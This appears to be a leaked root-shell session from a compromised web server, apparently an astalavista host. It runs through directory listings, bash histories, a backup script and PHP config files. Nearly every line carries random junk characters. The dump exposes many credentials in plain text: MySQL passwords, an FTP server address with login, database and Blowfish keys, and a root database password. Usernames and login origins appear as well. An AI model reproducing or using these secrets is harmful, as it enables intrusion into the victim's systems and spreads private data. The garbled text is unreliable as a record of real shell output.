# #+ j( S J6 o2 n- _; u
#####################################################
, P+ A* y G+ {' \# #$ `5 K" E) O$ m. m) t
# Admin Contact - 链接标记[email protected] #
Z7 r4 [8 {9 `* g# #2 V; T( B3 F j
# Available ShortCuts #
2 v; [7 a6 Z; n4 e# #; G; J5 L6 j* I3 o6 k$ I4 @
# nst - list active connections #' X4 H2 a5 @. c+ c; W, `0 W+ Q
# ddos - shows how many times each ip is connected #
4 s }9 W; V" b' i; ~( v8 m# ltr - restart the webserver #
5 U2 }1 d3 l5 D) y# phpc - edit the php config file #$ O4 W/ L7 R# h B( l
# htc - edit the webserver configuration file #% Q4 k/ ?2 a6 q/ v4 z
# up - uptime #* X+ w$ W" z! a$ ^" @- @
# etd - edit the motd of the day file #
4 R- h$ K* K( C; v8 y' Y; i# htr - start and restart apache if needed #! B8 K0 M) Z' e, R, J* ]* f5 m
# syng - shows active SYN_RECV connections #8 x! l' D( v. }6 z
# synd - syn flood blocker - “synd -h” for usage #: d, W- O7 [/ |& d0 A0 }* o* k
#####################################################! c% t n! v" c0 ~
# NOTES: #
9 M$ G Z4 s; V3 n7 A) K) R# Last Upgrade - 12-08-2008 by JF #
1 P3 E9 [# X# o3 Y0 O( r4 Z# My.cnf/Mysql Optimization - 1-28-09 #2 ]9 O1 j( ^2 T( Q, |4 H6 g
# #
# J# t/ B$ C$ w) s# #+ Q y. L4 m0 ^: S/ T
# #: Y$ Z/ z1 _/ r- J2 C5 E" G
#####################################################4 q u. T. a+ `# d3 A, L; N* {
9 k1 y4 i2 L2 g
sh-3.2# lastlog | grep -v Never! A5 G2 N I3 J& X/ }, ?
Username Port From Latest
/ m7 L# W+ T3 j1 r2 jroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20090 m" a( s+ f" S" b$ L" \* {+ G
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
* o% M$ Z& q# x* z K, \- p" n. w1 w' [com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
! u8 Z$ T3 R1 D o) e& wastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009- ~1 D3 J' p$ e' _8 u6 G, g
/ Q7 C$ c* i+ J9 Y9 F( [sh-3.2# ls -la( Y' J0 n- t7 h) R
total 453376/ y/ Z- F N2 t: |
drwxr-x— 15 root root 4096 Jun 4 08:40 .
* q& @) g2 j* k- b4 Udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..: d- W F- U+ X" w
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip$ `* |& @1 ]+ B' ^6 n4 B
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg/ [/ E" @8 ]+ s: i8 x7 F
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
( l P5 o* f. H6 C( u7 d-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout& a5 }7 r0 U: L' U- ]1 b
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
. z: N1 {4 F2 |-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
3 r- {& U. d* b5 K. p- h-rwx—— 1 root root 1899 Oct 28 2007 bk.sh$ B. N# i4 P2 i
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
a5 N0 [6 s; h5 G-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
6 O7 _. x* L. m! w' x3 @# L1 ^3 wdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan. l4 j4 F8 B. e6 p' ~
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
" D; e$ O3 L- m-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql/ g" K) E5 Y Q s
drwx—— 2 root root 4096 Oct 28 2007 .elinks% _# G2 ?' n: [
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1) H! w( _! P) Y) x( d7 Q, e2 t
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz22 ]9 g) D7 q% g' b7 u- V
-rw——- 1 root root 0 Apr 16 13:19 .history" X7 m! F7 N2 B U8 W
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
( f, j" W; ]: E( [) U& Q-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog/ v% t6 X `- w" l9 H
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh) r% T( }! U/ |6 @1 h" Q# u
-rw——- 1 root root 35 Jun 2 14:23 .lesshst7 t+ X2 `' c1 p5 {4 u& M3 ]
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
: H) a/ j8 C6 ~: Rdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec+ g: O. i4 l) _. w! Y" I
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
( h& u; H, @/ v; m& u% C3 A8 Y-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2 k5 u9 s* m$ g4 _+ D7 s
-rwx—— 1 root root 760 Sep 18 2008 lp, Q/ J4 W- I8 u1 F7 K: ~
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1- T# I9 u. }$ v
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
/ m5 K) D3 z; }-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1+ ]8 o( R4 _, Z3 O L7 M! [
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
2 A" Q6 G0 |- h5 i( f2 V1 G-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
' e$ T! ]4 V2 Y. S# hdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3" h2 B" T( p. d! v: P; l
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
: b0 n0 r* Z% ?6 ~& w4 a-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh/ I" v+ S7 q3 Z6 C9 j
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
I2 D, _+ E. f, V6 ?+ O-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
' D& n8 `! z$ M- K-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport6 {9 @( |: I# h7 H
-rw——- 1 root root 41 May 20 2008 .mytop2 R( S3 v3 K% y S4 E5 p( R+ I( ^
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
2 {( g _' x) T* K2 D-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz4 D& H% o5 s7 C- _
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp8 g: L: r: ?* f2 K) v
-rw——- 1 root root 1462 Sep 21 2007 opt.php
+ j1 `$ p2 ]; D0 J) [-rw-r–r– 1 root root 3371 Sep 22 2007 p+ O; C' U, g" O+ f
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2$ l3 s3 t; }9 \4 T5 V. z/ ?
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
% O% D" I% o7 z' v' j& J-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
) N: m1 v; Y& g1 K4 T# q2 x2 d-rw-r–r– 1 root root 887 Nov 28 2007 server.key, Z6 ^; q1 Y5 K% |% N
drwx—— 2 root root 4096 Oct 10 2008 .ssh
1 P7 p/ k" n" K! q-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat+ D; C' ?$ U/ L% C6 v" K9 D
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc* y9 F( |. ^0 r$ t
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip9 l m' ] L+ V k5 f4 \, J
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
7 W- A; u g i! m1 pdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
/ f2 }1 ~7 a0 g( s- g-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
. r/ ]8 D# a1 ~* t( Mdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0. `7 D% C0 B6 [ F
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz28 d# ?0 z- d5 A7 k8 o3 `! I: S
-rw——- 1 root root 12997 May 16 2008 .viminfo$ x* r! F& e, K: Z
7 p1 ^5 Q" Z4 P2 T
sh-3.2# cat .bash_history7 O( ?7 v2 g7 `2 B K) ?( G5 b
[snip]4 d3 u8 C: X6 p3 A# P
wget cp4sst.com/sstlinux.tar.gz
- m' B a; s4 w$ V* @1 B X1 ^tar zxvf sstlinux.tar.gz9 G) r& ?' c) G
cd linux-2.6.27.10
. ]8 {! }; c* @5 [sh install.sh
7 c7 y5 A% r' Mmake bzImage ; make modules ; make modules_install ; make install$ k: R7 n i3 D; N% d' J: ~
make clean
! _' A3 r% ?% _9 p- `' Sservice mysqld restart9 s$ B, A# L, ?4 E# c# ]
[snip]; H( b5 t' w ]2 d
cd /usr/sbin/
+ G. i/ L: e8 j; ^! }chmod 4777 traceroute
' z$ `$ ?, s }/ ?: k. ?2 Qchmod 4777 ping
8 [7 q# Q X& B4 W7 d" Ptraceroute -I 链接标记[url]www.astalavista.ch[/url]
8 ^4 z1 D2 M8 _0 u* R[snip]
. W1 E3 V, I3 A$ J) avi /etc/csf/csf.conf, ~) V& Z* L0 i9 I! ~5 q
traceroute google.ch Y% d2 B+ E" ?
service csf restart. ]1 v) x; ~/ I3 P
tracert google.ch
5 k9 v7 A Y& Z) k! Uservice csf restart1 j6 G' Q: H2 b+ V
traceroute 链接标记[url]www.google.ch[/url]- V' v2 ~/ h! \2 P
tracert 链接标记[url]www.google.ch[/url]
7 m% X4 K p# `$ M! |% i$ ~0 utraceroute 链接标记[url]www.google.ch[/url]
5 F! ?. _& R- o; n6 blocate traceroute# p- M, V1 o( A9 n& p' H# ?! W# [
chown 4755 /bin/traceroute
+ l% D% j3 x, I. Z( \chown 4777 /bin/traceroute
2 Z3 h6 W. J5 x3 e8 flocate ping
: u+ z" X9 x( A1 {) e- Y: ?chown 4755 /bin/ping- C& q; `/ ?7 i; R& i+ Z
chown 4777 /bin/ping
% |; x9 ^( }( V; i* s& h6 wcd /bin/
( n6 H7 \3 r4 ols -ali | grep ping; W4 [# T) e A7 T, B
chown root ping
5 W5 D9 J. n, |: i5 y7 Dchmod 4755 ping
5 \# s/ E& n0 h8 J) `; C+ Els -ali | grep traceroute
2 H; z" C( Q6 I1 D& V: zchown root traceroute; p- k( e4 p; m4 y
chmod 4755 traceroute! j6 U, i9 X8 V, p; `& a
ls -ali | grep traceroute% J% Q/ U3 d1 d W; {
traceroute -I 链接标记[url]www.google.ch[/url]
9 I8 V4 V( a) s, u! D# Rtraceroute 链接标记[url]www.google.ch[/url]
3 s$ b, c2 d" S) {$ u. bwhois pmsantos.ch" ?8 U- V! M$ l: J1 h$ h0 @
[snip]2 e+ u8 a! x* m5 a4 \( f5 k
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
& G/ r. I, J7 D; Vmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql w$ h p$ ]1 O t
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql, e! M' {& K3 b- L9 ?
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
% L% I" h, B) H6 e. L8 Wtop
6 r! w7 o5 h6 k, z. h' Tping ssth.ch$ A6 l8 a' @2 a9 @" j& R$ |
ping asdlkfaljgasd???ljg???lasj.ch- k+ V# y8 C; f" k6 r8 H" J
ping asdlkfaljgasdlasj.ch
2 U; R# Q Z% @2 f ^6 p/ N5 q5 xping 链接标记[url]www.ssth.ch[/url]
; }) I7 X4 `- v9 c4 iping ssth.ch+ v* n, h' Y6 r3 C, z K
nslookup 链接标记[url]www.google.ch[/url]
* Y: d! V& B" ^# o! F; E3 Cnslookup 链接标记[url]www.ssth.ch[/url]) }, B) F2 r) O' b5 z0 t; ~
man nslookup
# a4 @1 L8 |& y! E3 C! Xping 链接标记[url]www.google.ch[/url]! N, I% z" S( j/ o+ K
nslookup 链接标记[url]www.google.ch[/url]7 q& i4 ^( k. h
nslookup 链接标记[url]www.google.ch[/url]& B. p. I o5 D
nslookup salfjasdlf.ch3 I4 j$ Z( A5 A) D8 {/ ~. s
[snip]
( _! {5 U/ m5 D- q8 D: D* A8 d+ Hopenssl passwd -1 sadf$ ]9 |) X# w# g2 T
openssl passwd -1 5cZNHstdTy
+ N; A1 h0 X$ P* tmysql
8 G) S, r) P4 O9 k$ |2 Y! omysql. @& U9 V/ w: i
locate proftp
. j5 W& z8 |) H$ i) Evi /etc/proftpd.passwd
: [- L0 {4 _5 P5 e6 ^8 l* @service proftpd restart% W# q) B' }& M7 V9 U7 K
locate proftpd.conf
0 j4 t' ~: k8 ]vi /etc/proftpd.conf+ ?1 Z, {+ l& l, X
vi /etc/proftpd.passwd
" e0 [5 }1 Y3 H3 Jservice proftpd restart
9 H% p* W- }1 _" Y[snip]4 D! M/ X9 `" [+ l {
/bin/sh /home/com/backup_system/backup.sh
8 q; e# h8 ~$ ?* E& F# _tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin& z# M$ S2 O4 z
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql0 H2 ~, m) g9 t0 A1 n t; B
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql F7 D% T! d5 F
ls -ali
( _: O$ Z: C% \7 ~8 A3 {mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql {2 ]' }; m4 w4 Y* O6 V
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql j- L$ k! y, i6 j. b% v/ T) S
crontab -l' S" U/ w! p7 T" O/ k% y! {' `
crontab -l) H- M6 D$ t( k2 G( W
php -q /home/com/public_html/modifications/cronjobs/securitynews.php5 q7 M) |. K3 Y7 Z) A
/home/com/public_html/modifications/cronjobs/exploits.sh* [$ T9 K7 W# u! L
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]' j& [- N( r# C- x1 G
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz$ Q7 i& _* K5 E; d2 V( J6 X. H
cd lsws-4.0.32 _3 t% j) h l9 f: Y
sh install.sh
( t" }, W A6 K3 k7 guptime
# U; x" y0 T( t6 F/ c( fhdparm -tt /dev/sda
) z0 A. ]2 p$ j+ q# E4 P+ u k" [iostat
& }1 `8 G/ G, z' O5 lyum install iostat& H. v& G) \% Y2 K# ^( U2 U7 d
iostat
, G. @- X+ [! o1 y; W' |' _2 ?whereis iostat' a$ M* Z% @2 {( |% o3 f9 r$ u
yjm clean all
/ W7 ^! E2 i! Q# { iyum clean all ; yum -y update1 k$ V: o T# s# b! j1 M
iostat% ]: o5 j) W2 W6 _) j
yum install systat5 S# P; N0 ?0 [7 o$ I0 t
rpm -qa | grep iostat+ S/ F, S" p* |. |- U8 w
rpm -qa | grep sysstat
7 C; b% i9 Z2 b% x3 F d( `" lrpm -qa | grep systat2 B$ }' `" M- a$ @* [2 G; L% _" I+ O
dmesg -c0 B0 f$ a7 ~, C& c9 q
sysctl -p5 ]7 @6 A/ Z" W( S
uname -r0 j7 H* V, K1 f' }8 A5 B4 Q- L# ~5 F) }
cd /usr/src5 D: |5 c& T% ]6 g( N4 a$ D
wget nix101.com/kernels/sstlinux.tar.gz4 A) M; Z3 h. l) a
shutdown -r now
9 s2 Z" L) F! ]0 e' g5 G! V2 Wnano -w /boot/grub/grub.conf( m* y$ y6 E. ~; B/ U
8 u8 [& y# ]- x7 t, K6 F$ o; j
sh-3.2# cat .my.cnf
# \+ \) O( j+ J6 C[client]% M; u) y* ~* z* K$ |, o
user=da_admin
/ F4 I- j' n0 T3 qpassword=X9dctmRH# z- i' l) m: l; y
0 H7 s9 \1 z( I+ a1 R5 csh-3.2# cat /home/com/backup_system/backup.sh: q9 ]7 ?- W+ S8 t8 z5 i2 k% x1 T
#!/bin/sh
c2 m3 W% x! H) }#####################################################################8 ?6 M F" q% }, {7 z1 e: Y
# # r- u' |* d3 c, y* K& B
# incremental backup for astalavista.com #
) M3 B% |! S: X% a- }! M+ W* G# #" o* p* L T" D8 j) _' Y% g- a
# author: Paulo M. Santos <链接标记[email protected]> #
4 H: t1 D1 p. p& K# #5 {$ l$ A5 _% k7 j* \/ N
#####################################################################; s+ p V! U- \! h
[snip]
+ V+ V, I" J8 P4 o( RPROG_DIR=”/home/com/backup_system”;
0 Y9 r$ F- o# U0 C+ L6 nBACKUP_DIR=”/home/com/backups”;/ V o4 R- @+ \, G
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;! i) q* D3 l( w$ B e9 E, r3 h
# ftp for synology backup server
7 M9 a! d8 i N: A: m/ a# pFTP_HOST=”212.254.194.163″;
" `8 E, k1 [) K! f6 M+ sFTP_PORT=”21″;. A, d( J* j. ^; W4 n
FTP_USER=”astalavista.com”;
5 \' w- j+ K/ q v T2 f2 W4 DFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;: V0 m2 |# `1 R! g% c5 }3 b- h
FTP_DIR=”/astalavista.com”;
' O+ B# U* ]. I# A5 w1 a# database
2 M. a4 W: G, {- d1 wDB_HOST=”localhost”;4 ?2 \. O9 ]: S- `: M
DB_USER=”contrexxuser2″;
& d9 q R- N+ R" RDB_PASS=”0fEYNZgXz1pKe”;! S: `4 c: g, s) z) H
DB_DATABASE1=”com_contrexx2_live”;: J! p! \7 @7 u V, W0 E
DB_DATABASE2=”com_contrexx2″;
( a. b/ W# U, Q: }* N g* K9 y[snip]
# f4 }, V( F+ I4 S3 f1 tftp -in $FTP_HOST $FTP_PORT <<EOF
# i) l9 e( l7 P/ U! f/ vquote USER $FTP_USER
1 `1 x! y. u1 r( s# E, squote PASS $FTP_PASS3 E t* E7 z+ u0 i
cd $FTP_DIR5 v+ f+ a, u( m7 Z5 y3 \( [
put $DB_FULLNAME-SQL_Dump.tar( X1 j8 |/ \2 p2 B# b
put $BACKUP_FULLNAME-Public_HTML.tar
7 d6 G$ n1 P/ h) Z. _4 j2 }close7 [5 A) y/ Z+ d* O l
bye( ?9 u9 e" ~$ G( O
EOF
$ t' l' U+ _, L( G( s! F( y2 D @1 N: H
sh-3.2# cd /home) _4 |7 h0 W7 {5 |
sh-3.2# ls -la
) V, m$ M Z9 H# A9 stotal 1209 h, U0 o0 e" O( R* Q/ ] R
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .8 M# J4 H u# y7 m$ c
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
d+ w: s) q" m: v) _, J/ Pdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
- e+ \* B, |7 s: j-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
) l% o) H& T9 R0 q4 p E0 q, Y! f: f-rw——- 1 root root 8192 Jun 3 02:45 aquota.user3 K: K2 O! u( E4 q4 W
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet! E* w, ^% c, C( m; V
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup0 |. B8 A q1 q$ ?9 _. D3 D+ y
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141610 Z, ?# ~* ^, b1 u3 G* H$ n% i+ L
drwx–x–x 10 com com 4096 Apr 28 12:40 com
3 h# g3 W" o- @: u) |drwxr-xr-x 2 root root 4096 May 17 2007 ftp
( u6 S5 f+ t/ i6 Pdrwx—— 3 jon jon 4096 Sep 21 2007 jon
! ?: N4 S4 q, Q: \drwx—— 2 root root 16384 Sep 11 2007 lost+found
; s, Z* _3 r, R' ?1 S& H' f5 n: mdrwxr-xr-x 2 root root 4096 Sep 14 2007 my) Y' d& U& b1 V4 J% p
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata \3 `8 ]- S1 w* V! t1 M
drwx—— 2 jon jon 4096 Sep 15 2007 test1 O0 ^9 x! x# L7 k% h
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
/ }% s/ t; Z, W
" p7 n) h* A" D* ]! i& f; ssh-3.2# cd admin
2 _3 R; V" i8 r! h) Ash-3.2# ls -la
' [# T4 ~4 O5 F. ^3 Ftotal 1735896
* @) _' i4 F+ S0 Qdrwx–x–x 9 admin admin 4096 Nov 28 2007 .# I) F. B: {$ z2 \
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ {. X' V6 C( d3 ?3 d
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
~# P! t8 r( ]! I: ?# ?! pdrwx—— 2 admin admin 4096 Sep 28 2007 backups
2 o$ u; _7 o H% @-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
! I+ I# A0 ?( x& O/ U-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
5 t* i5 ~' f! ~' ? J-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
1 v$ {* S, V5 H5 U$ e1 @-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
8 ]1 p$ r( G7 r- f9 kdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
. V# s8 r6 i% V$ ldrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
3 I1 r8 R4 k; ]( G; cdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap& x5 q1 i6 M! E/ H* T3 Y$ x( C
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
5 m* U+ f/ N7 Y- N: l+ ^! G6 }drwx—— 2 admin admin 4096 Sep 21 2007 mail- P8 O& V! N& n6 s& R
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr% y, ^9 S4 G2 u6 A0 N
-rw-r–r– 1 root root 887 Nov 28 2007 server.key4 T k! S% ~5 }, _
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
* Y' j1 r$ j2 V7 s7 g# E2 T( F-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
% S6 D2 r5 S6 _# G, Cdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups$ M' T# p' h% @2 y
& h8 o' F( G ^ l. s; M8 f5 o
sh-3.2# ..& [- |+ L* \- D
sh-3.2# cd jon/ I, Q, j0 q: o" x! D
sh-3.2# ls -la
' i& `" Y9 E( N/ Ltotal 36
3 S8 ?8 ~5 T j% v! S) c* P; b$ Idrwx—— 3 jon jon 4096 Sep 21 2007 .* h$ C; ~7 a$ s! J. h
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
( i+ t8 W: X% r3 f' }6 x-rw——- 1 jon jon 53 Sep 21 2007 .bash_history4 j9 L; h& I6 A! B6 x
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout/ P! g/ a- f. F
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile8 X* K* D M. M6 R7 f* E
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc A5 P) ~! V& N8 u" ^% {2 ~
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
* V" d4 O; N8 c q8 Bdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html! ] R4 Y0 W8 ^9 {
) k, {, Y! P3 ~# H- d0 F
sh-3.2# cd ..) x' q3 X! t6 T! v2 b$ i# b) z; ^
sh-3.2# cd test
) e5 ]2 k' ~! a( ]sh-3.2# ls -la! U" ^3 q/ R) y. A
total 48
' ?5 ]9 ^+ Y( ?$ F7 @, Q5 wdrwx—— 2 jon jon 4096 Sep 15 2007 .
f" {. X1 q' l0 R. L2 o9 hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 {1 M9 p% V I; f
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history# n/ ?! r8 P7 X1 J
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout3 X# }$ R3 s% H7 o/ Q3 l! N5 l
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
$ y# x8 b1 T9 b u" _$ D-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc6 \1 V: `2 A2 y# e: `" E7 i1 _9 `
sh-3.2# cat .bash_history/ y4 w/ N" c: G+ t% x; r7 Q) V
/usr/bin/mysqladmin -u root password PoliuJhytg67
6 O& L1 K. A4 G% L
; H/ T1 i( R3 O+ |: Hsh-3.2# cd ..9 g: r3 W1 e. @' h% v
sh-3.2# cd astanet
9 t) Q1 Z; K, d- h8 n9 O' ksh-3.2# ls -la
+ }1 U; R1 {4 s: q2 [: r1 ltotal 52
! ^; F$ k' F7 m' B0 [drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .: k$ o) q& f x' q, w$ s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 B& Q) c' V% z5 Q$ d( W) i' ?; Y3 adrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth& G s% p; i% b+ }
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history* Y L" w' B6 m5 O/ A
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout- N, H4 o4 B; ~" C% t* O# [5 I2 t) W/ x
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
9 ^ j. N F, D2 F-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc, p0 k& _( l* C4 i0 z
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains1 h$ @# l& k/ i& w) r5 Z' q
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
3 X! q4 w1 `" S0 n# \# _' Udrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
% s0 z& o; i5 O: f* ]5 q-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history- m" e5 c2 `+ c& s, C
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html; @2 O+ \/ d; i1 Q7 |* B
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow: p( c4 o+ l5 r5 [- p
1 T/ C& h6 F9 B5 _ Xsh-3.2# cd auth/
6 P% q$ J/ u# Vsh-3.2# ls -la
2 a; Y: c( l2 B. i- Ztotal 28$ ~2 I1 q8 L/ q' E1 n( D
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .7 |" E/ r5 t1 j5 X E
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
- i/ U& B1 l8 N) w% O! V/ \% A-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php( r3 ~# t& U! |3 f8 t
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php: F- d; \# D! m% ], h! Z
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
* ^" \+ Y0 K- P$ k5 m. x-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting1 r$ ?( L. U# H
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
) K5 g& u! x" k# n2 n9 I5 G! A2 o- k- Q( u
sh-3.2# cat hackercontest.config.inc.php
, ^3 z& `& ?( g% N<?PHP
. |6 R, Z* \: S8 v// Variabeln f?r Verbindung zur Datenbank //
" n% v* B8 g: l* h- c$conxHost = ‘localhost’; // MySQL hostname
( n" ^1 @3 X7 u) Q$conxUser = ‘hackercontest’; // MySQL user1 v3 I$ d% c: N# j4 d* ]: n
$conxPassword = ‘K6m@7dUc’; // MySQL password
2 F( f: {6 z: P) m; g) Z" X: I( x$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish! ?# D' D1 b" u& w
?>! [( W# L- D- a3 \$ S
sh-3.2# cat hosting.config.inc.php
: M- `1 m* \& H0 w( B5 Q, ]' q<?PHP
3 i4 T5 Y l' G2 b// Variabeln f?r Verbindung zur Datenbank //
* x1 v; a4 Z5 n5 P. A" I. T- N$conxHost = ‘localhost’; // MySQL hostname
7 ~, j* m, z7 S p% l$conxUser = ‘hostinguser’; // MySQL user1 F; h0 j$ Y, A; E9 I: j# e
$conxPassword = ‘cXvB3981′; // MySQL password
7 [/ t5 r u$ F8 v6 M8 k5 l$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
0 f9 I) `( h1 r, i0 d& D3 K?>
2 |# x7 Z7 }5 O! x# g- }) e" h: A
y; C. K: L% f0 j; O# g3 ]& ]sh-3.2# cd ../ `. x! z) |+ r: b' h8 e" C7 d
sh-3.2# cd com
) ~$ M) j" z' Y" A9 _3 Ash-3.2# ls -la* e, Z% D7 d$ _6 H* {# S' C! b
total 1412087 J4 k, A1 n W6 t. F2 [, O7 b
drwx–x–x 10 com com 4096 Apr 28 12:40 .4 k* W, I& B! b; Z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( e% Y5 u7 |- Y( X# D
drwx—— 2 com com 4096 Jun 4 04:04 backups2 k6 C x' F, S0 I) y: J
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql' t B' }8 h0 j
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
8 R R7 j( s; ~-rw——- 1 com com 21880 Jun 2 08:07 .bash_history. X6 |' P1 r; K7 R% q
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout* \$ j. e& }! v3 m' a) j
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
